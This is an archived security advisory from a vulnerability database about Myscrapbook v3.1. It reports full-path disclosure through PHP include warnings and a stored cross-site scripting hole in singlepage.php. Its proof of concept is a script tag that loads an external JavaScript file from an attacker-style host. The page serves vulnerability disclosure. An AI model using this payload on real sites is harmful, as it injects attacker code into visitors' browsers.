Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13108
HistoryJun 13, 2006 - 12:00 a.m.

Myscrapbook v3.1 - XSS

2006-06-1300:00:00
vulners.com
10
JSON

Myscrapbook

Homepage:
http://www.pixytrix.com/myscrapbook/

Effected files:
singlepage.php

Full path error with viewing most files in the txt-db-api dir:
Warning: main(API_HOME_DIRutil.php): failed to open stream: No such file or directory in
/home/username/public_html

/myscrapbook/txt-db-api/sql.php on line 23

Warning: main(): Failed opening 'API_HOME_DIRutil.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php') in

/home/roguesta/public_html/myscrapbook/txt-db-api/sql.php on line 23

Warning: main(API_HOME_DIRconst.php): failed to open stream: No such file or directory in
/home/username/

public_html/myscrapbook/txt-db-api/sql.php on line 24

Warning: main(): Failed opening 'API_HOME_DIRconst.php' for inclusion
(include_path='.:/usr/lib/php:/usr/local/lib/php')

in /home/username/public_html/myscrapbook/txt-db-api/sql.php on line 24

When submitting pages into the scrapbook on singlepage.php, user input is not sanatized. This in
return could cause

XSS attacks. For PoC try putting:

[SCRIPT SRC=http://youfucktard.com/xss.js][/SCRIPT]

Screenshots of XSS vuln:

http://www.youfucktard.com/xsp/scrapbook1.jpg
http://www.youfucktard.com/xsp/scrapbook2.jpg
http://www.youfucktard.com/xsp/scrapbook3.jpg

JSON